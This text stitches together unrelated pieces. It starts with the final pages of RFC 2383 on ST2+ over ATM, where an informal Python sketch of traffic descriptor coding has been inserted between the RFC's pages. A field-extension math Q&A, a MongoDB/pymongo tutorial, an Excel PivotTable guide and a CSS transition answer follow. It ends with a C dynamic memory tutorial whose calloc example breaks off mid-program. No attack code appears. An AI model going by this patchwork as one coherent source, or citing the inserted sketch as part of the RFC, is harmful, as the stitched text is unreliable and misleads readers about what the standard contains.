RFC 2383 ST2+ over ATM August 1998 o Transit network selection o Endpoint reference o Endpoint state 6.7.1 ATM adaptation layer parameters coding The SETUP and ADD PARTY messages in the ST2+ over ATM protocol must include an ATM adaptation layer parameters information element. The CONNECT message may or may not include this element. The coding rules for the fields are as follows. o The AAL Type is set to AAL5. o The value of the Forward maximum CPCS size field is set to the same as that of the MaxMsgSize field in the CONNECT SCMP message corresponding to the SETUP or ADD PARTY message. o If the VC is established as a point-to-point call, the value of the Backward maximum CPCS size field is set the same as that of the Forward maximum CPCS size field. If the VC is established as a point-to-multipoint call, the value of the Backward maximum CPCS size field is set to zero. o The SSCS type is set to null. 6.7.2 ATM traffic descriptor coding If the Null FlowSpec is specified in the ST2+ over ATM protocol, the coding rules for the fields in the ATM traffic descriptor information element in the SETUP message are as follows. o The value of the Forward PCR (CLP=0+1) field depends on the specification of the ATM network. The Forward PCR (CLP=0+1) field in each ATM interface in an implementation must be configurable to any value between zero and 16,777,215. o If the VC is established as a point-to-point call, the value of the Backward PCR (CLP=0+1) field is set the same as that of the Forward PCR (CLP=0+1) field. If the VC is established as a point-to- multipoint call, the value of the Backward PCR (CLP=0+1) field is set to zero. o The Best effort indication must be present. If the Controlled-Load Service FlowSpec is specified, the coding rules for the fields are as follows. Suzuki Informational [Page 38]
RFC 2383 ST2+ over ATM August 1998 o The value of the Forward PCR (CLP=0+1) field depends on the specification of the ATM network. The Forward PCR (CLP=0+1) field in each ATM interface in an implementation must be configurable to any value between zero and 16,777,215. o If the VC is established as a point-to-point call, the value of the Backward PCR (CLP=0+1) field is set the same as that of the Forward PCR (CLP=0+1) field. If the VC is established as a point-to- multipoint call, the value of the Backward PCR (CLP=0+1) field is set to zero. o The method for calculating the Forward SCR (CLP=0+1) field is shown in section 5. o If the VC is established as a point-to-point call, the value of the Backward SCR (CLP=0+1) field is set the same as that of the Forward SCR (CLP=0+1) field. If the VC is established as a point-to- multipoint call, this field must not be present. o The method for calculating the Forward MBS (CLP=0+1) field is shown in section 5. o If the VC is established as a point-to-point call, the value of the Backward MBS (CLP=0+1) field is set the same as that of the Forward MBS (CLP=0+1) field. If the VC is established as a point-to- multipoint call, this field must not be present. o The Best effort indication, Tagging backward, and Tagging forward fields must not be present. 6.7.3 Broadband bearer capability coding If the Null FlowSpec is specified in the ST2+ over ATM protocol, the coding rules for the fields in the Broadband bearer capability information element in the SETUP message are as follows. o The Bearer class depends on the specification of the ATM network. The Bearer class in each ATM interface in an implementation must be configurable as either BCOB-X or BCOB-C. BCOB-X is recommended as the default configuration. o The Traffic type and Timing requirements fields must not be present. o The Susceptibility to clipping field is set to not susceptible to clipping. Suzuki Informational [Page 39]
RFC 2383 ST2+ over ATM August 1998 o If the VC is established as a point-to-point call, the User plane connection configuration field is set to point-to-point, and if the VC is established as a point-to-multipoint call, it is set to point-to-multipoint. If the Controlled-Load Service FlowSpec is specified, the coding rules for the fields are as follows. o The Bearer class depends on the specification of the ATM network. The Bearer class in each ATM interface in an implementation must be configurable as either BCOB-X or BCOB-C. BCOB-X is recommended as the default configuration. o If the Bearer class is BCOB-X, the Traffic type and Timing requirements fields depend on the specification of the ATM network. The Traffic type and Timing requirements fields in each ATM interface in an implementation must be configurable as either no indication or VBR and Not required, respectively. No indication is recommended as the default configuration. If the Bearer class is BCOB-C, the Traffic type and Timing requirements fields must not be present. o The Susceptibility to clipping field depends on the specification of the ATM network. The Susceptibility to clipping field in each ATM interface in an implementation must be configurable as either not susceptible to clipping or susceptible to clipping. Not susceptible to clipping is recommended as the default configuration. o If the VC is established as a point-to-point call, the User plane connection configuration field is set to point-to-point, and if the VC is established as a point-to-multipoint call, it is set to point-to-multipoint. 6.7.4 Broadband high layer information coding The SETUP and ADD PARTY messages in the ST2+ over ATM protocol must include a Broadband high layer information information element. The coding rules for the fields are as follows. o The High layer information type is set to User specific. o The first 6 bytes in the High layer information field are set to the SID of the stream corresponding to the VC. Suzuki Informational [Page 40]
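   As an informal illustration of the ATM traffic descriptor coding in
   section 6.7.2 above (not part of this specification), the following
   Python sketch collects the forward and backward cell rate values for
   a SETUP message, reusing the SCR/MBS calculation of section 5.2.
   The dictionary keys mirror the field names; the function name and
   the flowspec argument are illustrative assumptions.

      import math

      def traffic_descriptor(flowspec, forward_pcr, p2mp, S=1.2):
          # Backward values mirror the forward ones for point-to-point
          # calls; for point-to-multipoint calls the backward PCR is zero
          # and the backward SCR/MBS fields are not present.
          td = {"Forward PCR (CLP=0+1)": forward_pcr,
                "Backward PCR (CLP=0+1)": 0 if p2mp else forward_pcr}
          if flowspec is None:                       # Null FlowSpec
              td["Best effort indication"] = True
              return td
          scr = math.ceil(flowspec["r"] / 48.0 * S)  # section 5.2 mapping
          mbs = math.ceil(flowspec["b"] / 48.0 * S)
          td["Forward SCR (CLP=0+1)"] = scr
          td["Forward MBS (CLP=0+1)"] = mbs
          if not p2mp:
              td["Backward SCR (CLP=0+1)"] = scr
              td["Backward MBS (CLP=0+1)"] = mbs
          return td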
RFC 2383 ST2+ over ATM August 1998 6.7.5 Broadband low layer information coding The SETUP and ADD PARTY messages in the ST2+ over ATM protocol must include a Broadband low layer information information element. The CONNECT message may or may not include this element. The coding rules for the fields are as follows. o The User information layer 3 protocol field is set to ISO/IEC TR 9577 o The IPI field is set to IEEE 802.1 SNAP (0x80). o The OUI field is set to IANA (0x00-00-5E). o The PID field is set to ST2+ (TBD). 6.7.6 QoS parameter coding If the Null FlowSpec is specified in the ST2+ over ATM protocol, the coding rules for the fields in the QoS parameter in the SETUP message are as follows. o The QoS class forward and QoS class backward fields are set to QoS class 0. If the Controlled-Load Service FlowSpec is specified, the coding rules for the fields are as follows. o The QoS class forward and QoS class backward fields depend on the specification of the ATM network. The QoS class forward and QoS class backward fields in each ATM interface in an implementation must be configurable as either QoS class 0 or QoS class 3. QoS class 0 is recommended as the default configuration. 7. Security Considerations The ST2+ over ATM protocol modifies RFC 1819 ST2+ protocol, but basically these modifications are minimum extensions for ATM support and bug fixes, so they do not weaken the security of the ST2+ protocol. The ST2+ over ATM protocol specifies protocol interaction between ST2+ and UNI 3.1, and this does not weaken the security of the UNI 3.1 protocol. In an ST2+ agent that processes an incoming call of SVC, if the incoming SETUP message contains the calling party number and if it is verified and passed by the ATM network or it is provided by the Suzuki Informational [Page 41]
RFC 2383 ST2+ over ATM August 1998 network, then it is feasible to use the calling party number for part of the calling party authentication to strengthen security. References [1] Borden, M., Crawley, E., Davie, B., and S. Batsell, "Integration of Real-time Services in an IP-ATM Network Architecture", RFC 1821, August 1995. [2] Jackowski, S., "Native ATM Support for ST2+", RFC 1946, May 1996. [3] S. Damaskos and A. Gavras, "Connection Oriented Protocols over ATM: A case study", Proc. SPIE, Vol. 2188, pp.226-278, February 1994 [4] Delgrossi, L., and L. Berger, Ed., "Internet Stream Protocol Version 2 (ST2) Protocol Specification - Version ST2+", RFC 1819, August 1995. [5] Wroclawski, J., "Specification of the Controlled-Load Network Element Service", RFC 2211, September 1997. [6] Shenker, S., Partridge, C., and R. Guerin, "Specification of Guaranteed Quality of Service", RFC 2212, September 1997. [7] Wroclawski, J., "The Use of RSVP with IETF Integrated Services", RFC 2210, September 1997. [8] Garrett, M., and M. Borden, "Interoperation of Controlled-Load Service and Guaranteed Service with ATM", RFC 2381, August 1998. [9] Ghanwani, A., Pace, J., and V. Srinivasan, "A Framework for Providing Integrated Services Over Shared and Switched LAN Technologies", Work in Progress. [10] The ATM Forum, "ATM User-Network Interface Specification Version 3.1", September 1994. [11] The ATM Forum, "ATM User-Network Interface (UNI) Signaling Specification Version 4.0", af-sig-0061.000, July 1996. [12] ITU-T, "Broadband Integrated Services Digital Network (B-ISDN)- Digital Subscriber Signaling System No. 2 (DSS 2)-User-Network Interface (UNI) Layer 3 Specification for Basic Call/Connection Control", ITU-T Recommendation Q.2931, September 1995. Suzuki Informational [Page 42]
RFC 2383 ST2+ over ATM August 1998 [13] ITU-T, "Broadband Integrated Services Digital Network (B-ISDN)- Digital Subscriber Signaling System No. 2 (DSS 2)-User-Network Interface Layer 3 Specification for Point-to-Multipoint Call/Connection Control", ITU-T Recommendation Q.2971, October 1995 [14] ITU-T, "B-ISDN Protocol Reference Model and its Application", CCITT Recommendation I.321, April 1991. [15] ITU-T, "B-ISDN ATM Adaptation Layer (AAL) type 5 specification", Draft new ITU-T Recommendation I.363.5, September 1995. [16] Heinanen, J., "Multiprotocol Encapsulation over ATM Adaptation Layer 5", RFC 1483, July 1993. [17] Laubach, M., "Classical IP and ARP over ATM", RFC 1577, January 1994 [18] Perez, M., Liaw, F., Mankin, A., Hoffman, E., Grossman, D., and A. Malis, "ATM Signaling Support for IP over ATM", RFC 1755, February 1995. [19] Luciani, J., Katz, D., Piscitello, D., and B. Cole, "NBMA Next Hop Resolution Protocol (NHRP)", RFC 2332, April 1998. Suzuki Informational [Page 43]
RFC 2383 ST2+ over ATM August 1998 Acknowledgments ATM is a huge technology and without the help of many colleagues at NTT who are involved in ATM research and development, it would have been impossible for me to complete this protocol specification. I would like to thank Hideaki Arai and Naotaka Morita of the NTT Network Strategy Planning Dept., Shin-ichi Kuribayashi, Jun Aramomi, and Takumi Ohba of the NTT Network Service Systems Labs., and also Hisao Uose and Yoshikazu Oda of the NTT Multimedia Networks Labs. for their valuable comments and discussions. And I would also like to especially thank Eric Crawley of Gigapacket Networks, John Wroclawski of MIT, Steven Jackowski of Net Manage, Louis Berger of FORE Systems, Steven Willis of Bay Networks, Greg Burch of Qosnetics, and Denis Gallant, James Watt, and Joel Halpern of Newbridge Networks for their valuable comments and suggestions. Also this specification is based on various discussions during NTT Multimedia Joint Project with NACSIS. I would like to thank Professor Shoichiro Asano of the National Center for Science Information Systems for his invaluable advice in this area. Author's Address Muneyoshi Suzuki NTT Multimedia Networks Laboratories 3-9-11, Midori-cho Musashino-shi, Tokyo 180-8585, Japan Phone: +81-422-59-2119 Fax: +81-422-59-2829 EMail: [email protected] Suzuki Informational [Page 44]
RFC 2383 ST2+ over ATM August 1998 Appendix A. RFC 1819 ST2+ Errata A.1 4.3 SCMP Reliability The following sentence in the second paragraph: < For some SCMP messages (CONNECT, CHANGE, JOIN, and STATUS) the should be changed to > For some SCMP messages (CONNECT, CHANGE, and JOIN) the A.2 4.4.4 User Data The following sentence: < option can be included with ACCEPT, CHANGE, CONNECT, DISCONNECT, and < REFUSE messages. The format of the UserData parameter is shown in should be changed to > option can be included with ACCEPT, CHANGE, CONNECT, DISCONNECT, NOTIFY, > and REFUSE messages. The format of the UserData parameter is shown in A.3 5.3.2 Other Cases The following sentence: < CONNECT with a REFUSE message with the affected targets specified in < the TargetList and an appropriate ReasonCode (StreamExists). should be changed to > CONNECT with a REFUSE message with the affected targets specified in > the TargetList and an appropriate ReasonCode (TargetExists). A.4 5.5.1 Mismatched FlowSpecs The following sentence: < notifies the processing ST agent which should respond with ReasonCode < (FlowSpecMismatch). should be changed to > notifies the processing ST agent which should respond with a REFUSE > message with ReasonCode (FlowSpecMismatch). Suzuki Informational [Page 45]
RFC 2383 ST2+ over ATM August 1998 A.5 6.2.1 Problems in Stream Recovery The following sentence: < some time after a failure. As a result, the ST agent attempting the < recovery may receive ERROR messages for the new CONNECTs that are < ... < failure, and will interpret the new CONNECT as resulting from a < routing failure. It will respond with an ERROR message with the < appropriate ReasonCode (StreamExists). Since the timeout that the ST < ... < remnants of the broken stream will soon be torn down by a DISCONNECT < message. Therefore, the ST agent that receives the ERROR message with < ReasonCode (StreamExists) should retransmit the CONNECT message after should be changed to > some time after a failure. As a result, the ST agent attempting the > recovery may receive REFUSE messages for the new CONNECTs that are > ... > failure, and will interpret the new CONNECT as resulting from a > routing failure. It will respond with a REFUSE message with the > appropriate ReasonCode (TargetExists). Since the timeout that the ST > ... > remnants of the broken stream will soon be torn down by a DISCONNECT > message. Therefore, the ST agent that receives the REFUSE message with > ReasonCode (TargetExists) should retransmit the CONNECT message after A.6 6.3 Stream Preemption} The following sentence: < (least important) to 256 (most important). This value is should be changed to > (least important) to 255 (most important). This value is A.7 10.2 Control PDUs The following sentence: <o Reference is a transaction number. Each sender of a request control < message assigns a Reference number to the message that is unique < with respect to the stream. should be changed to Suzuki Informational [Page 46]
RFC 2383 ST2+ over ATM August 1998 >o Reference is a transaction number. Each sender of a request control > message assigns a Reference number to the message that is unique > with respect to the stream for messages generated by each agent. A.8 10.3.4 Origin The following: < +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ < | PCode = 5 | PBytes | NextPcol |OriginSAPBytes | < +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ should be changed to > +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ > | PCode = 4 | PBytes | NextPcol |OriginSAPBytes | > +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ A.9 10.4.1 ACCEPT The following sentence: <o IPHops is the number of IP encapsulated hops traversed by the < stream. This field is set to zero by the origin, and is incremented < at each IP encapsulating agent. should be changed to >o IPHops is the number of IP encapsulated hops traversed by the > stream. A.10 10.4.2 ACK The following: < +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ < | OpCode = 2 | 0 | TotalBytes | < +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ should be changed to > +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ > | OpCode = 2 | 0 | TotalBytes = 16 | > +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Suzuki Informational [Page 47]
RFC 2383 ST2+ over ATM August 1998 A.11 10.4.3 CHANGE The following sentence: <o I (bit 7) is used to indicate that the LRM is permitted to interrupt should be changed to >o I (bit 9) is used to indicate that the LRM is permitted to interrupt A.12 10.4.7 HELLO The following: < +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ < | OpCode = 7 |R| 0 | TotalBytes | < +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ should be changed to > +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ > | OpCode = 7 |R| 0 | TotalBytes = 20 | > +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ A.13 10.4.9 JOIN-REJECT The following sentence: <o Reference contains a number assigned by the ST agent sending the < REFUSE for use in the acknowledging ACK. should be changed to >o Reference contains a number assigned by the ST agent sending the > JOIN-REJECT for use in the acknowledging ACK. A.14 10.4.13 STATUS-RESPONSE The following sentence: < possibly Groups of the stream. It the full target list can not fit in should be changed to > possibly Groups of the stream. If the full target list can not fit in Suzuki Informational [Page 48]
RFC 2383 ST2+ over ATM August 1998 A.15 10.5.3 ReasonCode The following: < 32 PCodeUnknown Control PDU has a parameter with an invalid < PCode. should be removed because a common SCMP element with an unknown PCode is equivalent to the UserData (RFC 1819, Section 10.3.8). Suzuki Informational [Page 49]
RFC 2383 ST2+ over ATM August 1998 Full Copyright Statement Copyright (C) The Internet Society (1998). All Rights Reserved. This document and translations of it may be copied and furnished to others, and derivative works that comment on or otherwise explain it or assist in its implementation may be prepared, copied, published and distributed, in whole or in part, without restriction of any kind, provided that the above copyright notice and this paragraph are included on all such copies and derivative works. However, this document itself may not be modified in any way, such as by removing the copyright notice or references to the Internet Society or other Internet organizations, except as needed for the purpose of developing Internet standards in which case the procedures for copyrights defined in the Internet Standards process must be followed, or as required to translate it into languages other than English. The limited permissions granted above are perpetual and will not be revoked by the Internet Society or its successors or assigns. This document and the information contained herein is provided on an "AS IS" basis and THE INTERNET SOCIETY AND THE INTERNET ENGINEERING TASK FORCE DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION HEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. Suzuki Informational [Page 50]
I've been trying to come up with a simple algebraic extension $F(\alpha)$ over a field $F$ that has $[F(\alpha):F]$ not divisible by 3, but has $F(\alpha^3)$ properly contained in $F(\alpha)$. I haven't had any luck - maybe I'm thinking incorrectly, but all I can think of is cube roots, fourth roots and the like.
What about $\mathbb{R}(i)$? – Michael Albanese Dec 21 '12 at 23:48
@MichaelAlbanese, I'm looking for proper containment. $\mathbb{R}(i^3)=\mathbb{R}(i)$. – Frank White Dec 21 '12 at 23:50
Sorry, I missed the word 'properly'. – Michael Albanese Dec 21 '12 at 23:52
Although this does not help if $E$ is not supposed to be $F$ in one spot and $F(\alpha)$ in another, an example might be $\mathbb Q(\omega)$ where $\omega=\mathrm{exp}(2\pi i/3)$, since $\omega^2+\omega+1=0$. – peoplepower Dec 21 '12 at 23:52
@Frank: Sorry, not to nitpick, but the standard notation for the degree of an extension $L/K$ is $[L:K]$, i.e. the larger field is on the left. Now that I think I understand what you're asking, I'll edit. – Zev Chonoles Dec 22 '12 at 0:15
1 Answer
Consider the extension $\mathbb Q(\omega)/\mathbb Q$ with $\omega=e^{2\pi i/3}$, and note that $\omega$ is a root of the polynomial $x^3-1=(x-1)(x^2+x+1)$. Since $\omega$ is distinct from $1$, it must satisfy $p(x)=x^2+x+1$. Finally, $p(x+1)=x^2+3x+3$ is irreducible over $\mathbb{Q}$ by Eisenstein's Criterion.
Therefore the extension is a degree 2, simple extension generated by a cube root of an element of the base field.
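To spell out why this answers the original question: since $\omega^3=1$, we get $\mathbb{Q}(\omega^3)=\mathbb{Q}(1)=\mathbb{Q}\subsetneq\mathbb{Q}(\omega)$, while $[\mathbb{Q}(\omega):\mathbb{Q}]=2$, which is not divisible by $3$.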
Looks OK to me, +1 – Belgi Dec 22 '12 at 14:04
Siddhesh Shankar
Learn MongoDB + Python basics in 5 minutes !
What is MongoDB?
MongoDB is a NoSQL database – that is, a database you don't query with SQL. Beyond that, "NoSQL" says very little about what the database actually is, so let's have another go at defining MongoDB: it is a JSON document datastore. It allows you to store and query JSON-style documents with a few smarts on top. This means that you can store objects with nested data all in one collection (collections are MongoDB's rough equivalent of tables).
What is MongoDB Compass?
MongoDB Compass is the GUI for MongoDB. Compass allows you to analyze and understand the contents of your data without formal knowledge of the MongoDB query syntax. Click here to download it and watch this video to install Compass.
Let's Code
• Install pymongo. Just open the command prompt and type:
pip install pymongo
• Open Jupyter Notebook. Let's create a database first.
import pymongo

DEFAULT_CONNECTION_URL = "mongodb://localhost:27017/"
database_name = "Indian_States_DB"
# Establish a connection with mongodb
client = pymongo.MongoClient(DEFAULT_CONNECTION_URL)
## Creating a Database
database = client[database_name]
• Create a collection. A collection in MongoDB is the rough equivalent of a table. We create an empty collection below.
# Creating a collection
COLLECTION_NAME = 'Gross_Domestic_Product'
# Adding the collection to our database
collection = database[COLLECTION_NAME]
• Let's check if our database exists or not.
client.list_database_names()
> ['admin', 'config', 'crawlerDB', 'demoDB', 'local']
The database name does not appear in the above list because there is no data inside Gross_Domestic_Product yet – MongoDB only creates the database once it holds some data.
Inserting Records
# Inserting one record
record = {
"Rank": "1",
"State": "Maharastra",
"Nominal GDP ($ Billion)": "400",
"Data Year": "2019-2020",
"Comparable Country": "Philippines"
}
collection.insert_one(record)
# Inserting multiple records
records = [{
"Rank": "2",
"State": "Tamil Nadu",
"Nominal GDP ($ Billion)": "260",
"Data Year": "2019-2020",
"Comparable Country": "Vietnam"
},
{
"Rank": "3",
"State": "Uttar Pradesh",
"Nominal GDP ($ Billion)": "250",
"Data Year": "2019-2020",
"Comparable Country": "Romania"
},
{
"Rank": "4",
"State": "Karnataka",
"Nominal GDP ($ Billion)": "240",
"Data Year": "2019-2020",
"Comparable Country": "Portugal"
}]
collection.insert_many(records)
• Again check if the database exists or not.
client.list_database_names()
> ['Indian_States_DB', 'admin', 'config', 'crawlerDB', 'demoDB', 'local']
Find Records
• The find() method returns all documents matching the selection. Here we select the Rank and State fields from the collection.
for i in collection.find({},{"_id":0, "Rank":1, "State":1}):
print(i)
{'Rank': '1', 'State': 'Maharastra'}
{'Rank': '2', 'State': 'Tamil Nadu'}
{'Rank': '3', 'State': 'Uttar Pradesh'}
{'Rank': '4', 'State': 'Karnataka'}
You are not allowed to specify both 0 and 1 values in the same object (except if one of the fields is the _id field). If you specify a field with the value 0, all other fields get the value 1, and vice versa. For selecting all the records, simply execute find().
Sort
• Use the sort() method to sort the result in ascending or descending order. Use the value -1 as the second parameter to sort descending.
for i in collection.find({},{"_id":0,"State":1, "Nominal GDP ($ Billion)":1}).sort("State", -1):
print(i)
{'State': 'Uttar Pradesh', 'Nominal GDP ($ Billion)': '250'}
{'State': 'Tamil Nadu', 'Nominal GDP ($ Billion)': '260'}
{'State': 'Maharastra', 'Nominal GDP ($ Billion)': '400'}
{'State': 'Karnataka', 'Nominal GDP ($ Billion)': '240'}
Limit the Result
• To limit the result in MongoDB, we use the limit() method.
for i in collection.find({},{"_id":0, "Rank":1, "State":1, "Comparable Country":1}).limit(2):
print(i)
{'Rank': '1', 'State': 'Maharastra', 'Comparable Country': 'Philippines'}
{'Rank': '2', 'State': 'Tamil Nadu', 'Comparable Country': 'Vietnam'}
Delete Records
To delete one document, we use the delete_one() method. To delete more than one document, use the delete_many() method.
collection.delete_one({"State": "Maharastra"})
for i in collection.find():
print(i)
{'_id': ObjectId('5f8ae0347d1ce4be5cea8007'), 'Rank': '2', 'State': 'Tamil Nadu', 'Nominal GDP ($ Billion)': '260', 'Data Year': '2019-2020', 'Comparable Country': 'Vietnam'}
{'_id': ObjectId('5f8ae0347d1ce4be5cea8008'), 'Rank': '3', 'State': 'Uttar Pradesh', 'Nominal GDP ($ Billion)': '250', 'Data Year': '2019-2020', 'Comparable Country': 'Romania'}
{'_id': ObjectId('5f8ae0347d1ce4be5cea8009'), 'Rank': '4', 'State': 'Karnataka', 'Nominal GDP ($ Billion)': '240', 'Data Year': '2019-2020', 'Comparable Country': 'Portugal'}
This was all about the basics of MongoDB. I hope you liked my explanation. If you have any query, feel free to ask in the comments section.
How Do You Create a Pivot Table in Excel?
To create a PivotTable in Excel 2010, click Insert at the top of the worksheet, and select the PivotTable icon on the left. To properly generate a PivotTable, you must first organize your data and then design the layout.
1. Organize the data set
Organize your data into columns with headings, and make sure there are no empty rows or columns. This layout is required to create a PivotTable in Excel 2010. After organizing your worksheet, click on any cell within the data set, and proceed to insert the PivotTable. Excel then automatically determines your table's range, although you can alter it by entering a different cell range. After confirming the range, choose whether you want your table to appear on a new or existing worksheet, and click OK.
2. Drag fields
After clicking OK, Excel creates an empty PivotTable report in your specified location. Organize your PivotTable through the field list on the right. Select a field by clicking its check box, then drag it into the desired layout area or right-click it and choose where it should go. Adjust the results so that the data is presented in a clear and concise manner. To change how the data is calculated or presented, click the drop-down menus within the Values field.
3. Apply finishing touches
After organizing your pivot table, click the Design and Options tabs under the PivotTable Tools menu. Explore the options provided under each tab. Select the table’s headings to apply filters for sorting purposes or to rename the fields. Continue to make adjustments until your data is presented in the desired manner.
Vikas Kumar - 9 months ago
CSS Question
What is the difference between applying CSS transition property in hover rather than in its normal state?
I'm learning CSS3. What I've seen on the w3schools website is this:
CSS
#ID{
transition: transform 3s;
}
#ID:hover{
transform: rotateX(20deg);
}
And what I did is this:
CSS:
#ID:hover{
transform: rotateX(20deg);
transition: transform 3s;
}
Both work. So the question is: can I put both the transition and the transform properties in the same selector, or is that not the right way?
Answer
SHORT ANSWER:
If you define your transition property in element:hover, it will only get applied in that state.
EXPLANATION:
Whichever CSS properties you define in element:hover will only be applied when the element is in the hover state, whereas whichever CSS properties you define in your element will be applied in both states.
Transition property declared in normal state:
See how the transition always runs when the element's state is changed. When you stop hovering the element it will still make the transition back to its normal state.
CODE SNIPPET:
#ID {
width: 100px;
height: 100px;
margin: 0 auto;
background-color: royalblue;
transition: transform 1s;
}
#ID:hover {
transform: rotateX(60deg);
}
<div id="ID"></div>
Transition property declared in hovered state:
See how the transition breaks when you stop hovering the element and it jumps to its normal state immediately.
CODE SNIPPET:
#ID {
width: 100px;
height: 100px;
margin: 0 auto;
background-color: royalblue;
}
#ID:hover {
transition: transform 1s;
transform: rotateX(60deg);
}
<div id="ID"></div>
Dynamic Memory Allocation in C with Example
Dynamic memory allocation refers to manual memory management in the C language.
Need of Manual Memory Management/ Dynamic Memory Allocation :
• In the case of an array, the programmer must declare the size of the array at compile time (the time when a compiler translates code written in a programming language into executable form).
• But consider a situation in which the programmer has no idea of the length/size of the array to define.
• In that case, the size declared may turn out to be either insufficient or larger than required.
• In the first case the program runs out of space, and in the latter case space is wasted.
• Since the exact size of the array is unknown, the programmer needs dynamic memory allocation.
A brief description on Memory layout of C programs
C facilitates dynamic memory allocation. Let us understand how C organizes memory for its programs. When a compiled program is run, distinct regions of memory are set up, each used for a specific purpose. These regions are :
1. Program code segment/region
2. Data segment/region
1. Initialised data or data segment
2. Uninitialised data or .bss segment
3. Stack region
4. Heap region
[Figure: memory layout of a C program]
Regions :
Program Code Region :
This region of memory holds the compiled code of the program. Every instruction and every function of the program starts at a particular address.
Data Segment :
The data segment stores program data – initialised or uninitialised, global or static local variables. It is further divided into:
1. Initialised data or data segment : It stores all initialised :
• Global variables( including Global static variables)
• Static local variables
• Constant
• External variables
2. Uninitialised data or .bss segment : It stores all uninitialised :
• Global variable
• Static variable
• External variable
Data in this segment is initialised to arithmetic zero by the kernel before the program starts executing.
For example,
static int i; // This variable would be in .bss segment
int j; /* j is globally declared. and therefore it
would also be in .bss segment */
Stack Region :
This region is used for a great many things while your program executes. The stack holds :
• return addresses at function calls
• arguments passed to the functions
• and local variables of functions. These variables remain in memory as long as the function is executing and are discarded after it returns.
• It also stores the current state of the CPU.
Heap Memory Region :
• The heap memory area is a region of free memory from which chunks of memory are allocated via the C dynamic memory allocation functions.
• It contains a linked list of used and free blocks.
• Blocks are handed out from the heap dynamically at run time (in contrast to static memory allocation, which is settled at compile time). This requires meta-information about the blocks on the heap, stored in front of every block, so that available/free blocks can be tracked. A short sketch below shows where variables of each kind typically end up.
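As a rough illustration only (a minimal sketch – the variable names are made up here, and exact segment placement depends on the compiler and operating system), the following program shows where variables of each kind typically live:
#include <stdio.h>
#include <stdlib.h>
int g_init = 10;    /* initialised global -> data segment */
int g_uninit;       /* uninitialised global -> .bss segment */
int main()
{
    static int s_count;    /* static local -> .bss segment */
    int local = 5;         /* local variable -> stack */
    int *heap_ptr = (int*)malloc(sizeof(int));    /* allocated block -> heap */
    if(heap_ptr == NULL)
        return 1;
    *heap_ptr = 42;
    printf("data: %d, bss: %d %d, stack: %d, heap: %d\n", g_init, g_uninit, s_count, local, *heap_ptr);
    free(heap_ptr);        /* return the heap block to the system */
    return 0;
}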
To know more about memory layout in C – Click here.
To know about memory layout of C++ – Click Here.
Dynamic Memory Functions of C :
The C dynamic memory allocation functions are declared in the stdlib.h header.
Function – Description – Syntax:
malloc() – allocates the specified number of bytes – void *malloc(size_t size);
realloc() – increases or decreases the size of the specified block of memory, moving (reallocating) it if needed – void *realloc(void *ptr, size_t newsize);
calloc() – allocates space for an array of elements and initializes it to zero – void *calloc(size_t num, size_t size);
free() – releases the specified block of memory back to the system – void free(void *ptr);
C malloc() Function :
• malloc() function is used to allocate space in memory during the execution of the programme.
• malloc() does not initialise the allocated memory; it contains garbage values.
• malloc() returns a null pointer if it cannot allocate the requested amount of memory.
• malloc() stands for memory allocation.
Syntax of malloc() Function :
p = (cast-type*)malloc(byte-size)
Here, p is a pointer of cast-type. The malloc() function allocates byte-size bytes and returns the address of the allocated memory, which is stored in p. When there is not enough space, allocation fails and a NULL pointer is returned.
p = (int*)malloc(100*sizeof(int));
This statement allocates 200 bytes on a system where int occupies 2 bytes (e.g. a 16-bit system), and p points to the first byte of the allocated memory.
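A small self-contained sketch of typical malloc() usage (the element count of 100 is arbitrary; note the error check and the matching free()):
#include <stdio.h>
#include <stdlib.h>
int main()
{
    int i, n = 100;
    int *p = (int*)malloc(n * sizeof(int));    /* request space for n ints */
    if(p == NULL)                              /* always check the result */
    {
        printf("malloc failed\n");
        return 1;
    }
    for(i = 0; i < n; i++)                     /* the memory is uninitialised, so fill it */
        p[i] = i;
    printf("last element = %d\n", p[n-1]);
    free(p);                                   /* release the block when it is no longer needed */
    return 0;
}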
C calloc() Function :
• The calloc() function stands for contiguous allocation of memory.
• It is just like the malloc() function, with the difference that calloc() initialises the allocated memory to zero, while malloc() does not.
Syntax of calloc() :
p = (cast-type*)calloc(n,element-size);
Here, p is a pointer of cast-type. The calloc() function allocates contiguous space in memory for n elements of element-size bytes each and returns the address of the allocated memory, which is stored in p. If the space is insufficient, allocation fails and a NULL pointer is returned.
p = (float*)calloc(25,sizeof(float));
This statement creates an array of 25 elements, each the size of a float (typically 4 bytes). In other words, it allocates contiguous space in memory for 25 four-byte elements, all initialised to zero.
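A similar sketch for calloc() (the sizes are arbitrary):
#include <stdio.h>
#include <stdlib.h>
int main()
{
    float *p = (float*)calloc(25, sizeof(float));    /* space for 25 floats, all set to zero */
    if(p == NULL)
    {
        printf("calloc failed\n");
        return 1;
    }
    printf("p[0] = %f\n", p[0]);    /* prints 0.000000 because calloc zero-fills the block */
    free(p);
    return 0;
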